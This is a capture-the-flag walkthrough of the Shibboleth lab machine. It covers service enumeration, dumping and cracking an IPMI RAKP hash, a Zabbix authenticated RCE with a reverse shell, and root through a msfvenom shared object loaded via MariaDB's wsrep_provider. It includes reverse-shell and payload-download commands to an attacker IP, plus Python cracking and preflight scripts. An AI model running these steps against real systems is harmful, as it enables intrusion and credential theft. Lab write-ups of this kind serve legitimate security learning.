/etc/hosts
10.10.11.124 shibboleth.htb
nmap
nmap -sV shibboleth.htb
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
Only one TCP port is open: Apache httpd 2.4.41 on 80.
gobuster
gobuster dir -t 100 -u http://shibboleth.htb/ -w ~/Documents/wordlist/directory-list-medium.txt
/assets (Status: 301) [Size: 317] [--> http://shibboleth.htb/assets/]
/forms (Status: 301) [Size: 316] [--> http://shibboleth.htb/forms/]
/server-status (Status: 403) [Size: 279]
http://shibboleth.htb/forms/
In the Readme.txt we have this:
Fully working PHP/AJAX contact form script is available in the pro version of the template.
You can buy it from: https://bootstrapmade.com/flexstart-bootstrap-startup-template/
In the contact.php we have this:
Unable to load the "PHP Email Form" Library!
Subdomain enumeration
wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains-top1million-5000.txt -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" --hw 26
--hw 26 hides every response with a word count of 26, which is what the default virtual host returns, so only hosts that serve different content remain; -f sub-fighter writes the results to a file. The main page also hints at it: the subdomain is zabbix.shibboleth.htb, which needs its own /etc/hosts entry pointing at 10.10.11.124.
gobuster
gobuster dir -t 100 -u http://zabbix.shibboleth.htb -w ~/Documents/wordlist/directory-list-medium.txt -k
/modules (Status: 301) [Size: 332] [--> http://zabbix.shibboleth.htb/modules/]
/assets (Status: 301) [Size: 331] [--> http://zabbix.shibboleth.htb/assets/]
/audio (Status: 301) [Size: 330] [--> http://zabbix.shibboleth.htb/audio/]
/local (Status: 301) [Size: 330] [--> http://zabbix.shibboleth.htb/local/]
/app (Status: 301) [Size: 328] [--> http://zabbix.shibboleth.htb/app/]
/js (Status: 301) [Size: 327] [--> http://zabbix.shibboleth.htb/js/]
/include (Status: 301) [Size: 332] [--> http://zabbix.shibboleth.htb/include/]
/conf (Status: 301) [Size: 329] [--> http://zabbix.shibboleth.htb/conf/]
/vendor (Status: 301) [Size: 331] [--> http://zabbix.shibboleth.htb/vendor/]
/fonts (Status: 301) [Size: 330] [--> http://zabbix.shibboleth.htb/fonts/]
/locale (Status: 301) [Size: 331] [--> http://zabbix.shibboleth.htb/locale/]
/server-status (Status: 403) [Size: 286]
Every directory returns 403 when browsed directly: listing is disabled.
Nothing useful comes out of this, and the public Zabbix exploits fail at this point, so enumeration continues on other ports.
nmap UDP
sudo nmap -sU --min-rate 5000 shibboleth.htb
PORT STATE SERVICE
518/udp closed ntalk
623/udp open asf-rmcp
16919/udp closed unknown
16972/udp closed unknown
30975/udp closed unknown
42431/udp closed unknown
44253/udp closed unknown
UDP 623 (IPMI over RMCP+) is open.
Exploit IPMI (port 623)
msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.10.11.124
run
...
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:5479a2ba820600003ad3a123b77e26a23ce881756019b75dec504d50007565022cf0fcdb1f86674ba123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:2d636e7b85ec1c5ab81526480df9ff2e614f4379
Crack the hash
Save the dumped line to a file named hash. hashcat's IPMI mode expects salt:hash, so either strip the leading Administrator: or run hashcat with --username. First check the mode number:
hashcat -h |grep IPMI
Output
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocol
The command is therefore:
hashcat -m 7300 -a 0 hash /home/peanutstick/Documents/wordlist/rockyou.txt
rockyou.txt contains the password and hashcat recovers it.
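Why this hash is crackable offline, as an added example that is not part of the original writeup: in IPMI 2.0 RAKP authentication the BMC answers RAKP message 1 with an HMAC-SHA1 over the session fields, keyed with the requested account's password, before the client has proved anything. Metasploit prints that as user:salt:hmac, and hashcat mode 7300 just tries HMAC-SHA1(candidate, salt) against the hmac. The script below parses such a line, recovers the username from the tail of the salt (role byte, length byte, name) and tries a wordlist. WRITEUP_LINE is the line dumped above; SAMPLE_LINE, its password Summer2021! and the session values used to build it are constructed for the demonstration.

```python
import hashlib
import hmac

# A dumped RAKP "hash" (Metasploit ipmi_dumphashes / hashcat -m 7300 format):
#   user:salt_hex:hmac_hex
# The salt is what the BMC signed in RAKP message 2:
#   SIDm(4) | SIDc(4) | RandM(16) | RandC(16) | GUIDc(16) | RoleM(1) | ULen(1) | Username
# and the HMAC-SHA1 key is the account password, so it can be brute-forced offline.

# Line captured in the writeup above (its password is not shown there).
WRITEUP_LINE = (
    "Administrator:"
    "5479a2ba820600003ad3a123b77e26a23ce881756019b75dec504d50007565022cf0fcdb1f86674b"
    "a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:"
    "2d636e7b85ec1c5ab81526480df9ff2e614f4379"
)

SALT_PREFIX_LEN = 4 + 4 + 16 + 16 + 16  # everything before the role byte


def parse_dump_line(line):
    """Split 'user:salt_hex:hmac_hex' into (user, salt bytes, hmac bytes)."""
    user, salt_hex, mac_hex = line.strip().split(":")
    return user, bytes.fromhex(salt_hex), bytes.fromhex(mac_hex)


def username_from_salt(salt):
    """The BMC signed RoleM, the username length and the username last."""
    ulen = salt[SALT_PREFIX_LEN + 1]
    start = SALT_PREFIX_LEN + 2
    return salt[start:start + ulen].decode("ascii")


def rakp_hmac(password, salt):
    """What the BMC computes: HMAC-SHA1 keyed with the account password."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def crack(line, wordlist):
    """Return the first candidate whose HMAC matches the dumped one, or None."""
    user, salt, mac = parse_dump_line(line)
    if username_from_salt(salt) != user:
        raise ValueError("username in salt does not match the dumped user")
    for candidate in wordlist:
        if hmac.compare_digest(rakp_hmac(candidate, salt), mac):
            return candidate
    return None


def build_dump_line(user, password, sid_m, sid_c, rand_m, rand_c, guid_c, role=0x14):
    """Build a line the way a BMC would sign it; used only to make a test vector."""
    name = user.encode("ascii")
    salt = sid_m + sid_c + rand_m + rand_c + guid_c + bytes([role, len(name)]) + name
    return f"{user}:{salt.hex()}:{rakp_hmac(password, salt).hex()}"


# Constructed sample: session values and the password are made up for this demo.
SAMPLE_LINE = build_dump_line(
    "Administrator", "Summer2021!",
    sid_m=bytes.fromhex("a4a3a2a0"), sid_c=bytes.fromhex("02000000"),
    rand_m=bytes(range(16)), rand_c=bytes(range(16, 32)), guid_c=bytes(range(32, 48)),
)
SAMPLE_WORDLIST = ["password", "admin", "Summer2021!", "zabbix"]

if __name__ == "__main__":
    print("writeup line is for user:", username_from_salt(parse_dump_line(WRITEUP_LINE)[1]))
    print("sample line cracks to:", crack(SAMPLE_LINE, SAMPLE_WORDLIST))
```

hashcat -m 7300 does exactly this loop at GPU speed; the script is only there to show that nothing about the "hash" is secret except the password, which is why a BMC reachable on UDP 623 with a weak password is a foothold.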
Zabbix
The Zabbix frontend reports version 5.0.17, so the matching authenticated RCE exploit applies:
https://packetstormsecurity.com/files/166256/Zabbix-5.0.17-Remote-Code-Execution.html
Run it with the Zabbix URL, the Administrator credentials cracked from the IPMI hash, and the address and port of a waiting nc listener:
python3 exploit.py http://zabbix.shibboleth.htb Administrator Thepassword 10.10.14.147 4648
A reverse shell comes back.
Privilege escalation
ls /home
Output
ipmi-svc
The ipmi-svc account reuses the password recovered from the IPMI hash, so switch to it:
su ipmi-svc
Enumeration from the shell
First upgrade to a proper TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then look for credentials stored in clear text under /etc:
grep -rnwi /etc -e "password" --color=always 2>/dev/null
Exploit MySQL (MariaDB wsrep_provider)
Create the payload
Use a different port from the first reverse shell, since 4648 is already taken by the Zabbix shell.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.147 LPORT=4649 -f elf-so -o exp.so
python2.7 -m SimpleHTTPServer
Listen with netcat.
nc -nlvp 4649
Upload the payload
On the server
mkdir /tmp/exp
cd /tmp/exp
wget http://10.10.14.147:8000/exp.so
Execute the payload
Log in to the database with the zabbix credentials found above and point wsrep_provider at the uploaded library:
mysql -u zabbix -p
SET GLOBAL wsrep_provider="/tmp/exp/exp.so";
Setting a global variable needs the SUPER privilege, which the zabbix database user has here, and mysqld loads the shared object with its own privileges. Since the daemon runs as root, the listener on 4649 receives a root shell.
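As an added example that is not part of the original writeup: before loading a library through wsrep_provider it is worth checking the three things the trick depends on, so a failed SET GLOBAL can be explained. The table lists the MariaDB releases that fixed this library-load issue (CVE-2021-27928); the version string, SHOW GRANTS line and ps output used as inputs in the block are constructed samples, not captures from the box, and the helper names are mine.

```python
import re

# Fixed MariaDB releases for the wsrep_provider arbitrary-library-load bug
# (CVE-2021-27928). An older server on the same branch loads any .so that a
# user holding SUPER names in SET GLOBAL wsrep_provider, with mysqld's privileges.
FIXED_RELEASES = {
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}


def parse_version(version_string):
    """'10.3.25-MariaDB-0ubuntu0.20.04.1' -> (10, 3, 25); None if not MariaDB."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)-MariaDB", version_string)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def wsrep_provider_exploitable(version_string):
    """True when the reported version predates the fix on its branch."""
    v = parse_version(version_string)
    if v is None or v[:2] not in FIXED_RELEASES:
        return False  # not MariaDB, or a branch not covered by the table above
    return v < FIXED_RELEASES[v[:2]]


def has_super(grant_lines):
    """SET GLOBAL needs SUPER (or ALL PRIVILEGES) granted on *.* in SHOW GRANTS."""
    for line in grant_lines:
        m = re.match(r"GRANT (.+?) ON \*\.\* TO", line)
        if m:
            privs = {p.strip().upper() for p in m.group(1).split(",")}
            if "ALL PRIVILEGES" in privs or "SUPER" in privs:
                return True
    return False


def mysqld_runs_as_root(ps_lines):
    """Parse 'ps -eo user,comm' lines; the loaded code runs as the daemon's user."""
    for line in ps_lines:
        fields = line.split()
        if len(fields) == 2 and fields[1] in ("mysqld", "mariadbd") and fields[0] == "root":
            return True
    return False


def preflight(version_string, grant_lines, ps_lines):
    """Return the three conditions the wsrep_provider privilege escalation needs."""
    return {
        "vulnerable_version": wsrep_provider_exploitable(version_string),
        "has_super": has_super(grant_lines),
        "daemon_is_root": mysqld_runs_as_root(ps_lines),
    }


# Constructed sample inputs (not captured from the box): the output of
#   SELECT @@version;   SHOW GRANTS;   ps -eo user,comm
SAMPLE_VERSION = "10.3.25-MariaDB-0ubuntu0.20.04.1"
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO `zabbix`@`localhost` IDENTIFIED BY PASSWORD '*0000'",
]
SAMPLE_PS = ["USER COMMAND", "root systemd", "root mysqld", "zabbix zabbix_server"]

if __name__ == "__main__":
    result = preflight(SAMPLE_VERSION, SAMPLE_GRANTS, SAMPLE_PS)
    print(result)
    if all(result.values()):
        print('SET GLOBAL wsrep_provider="/tmp/exp/exp.so"; should give a root shell')
```

If the version is patched the statement is refused, if SUPER is missing it fails with an access-denied error, and if mysqld runs as the mysql user the shell that comes back is only that user's, so each of the three checks maps to a different failure mode of the final step.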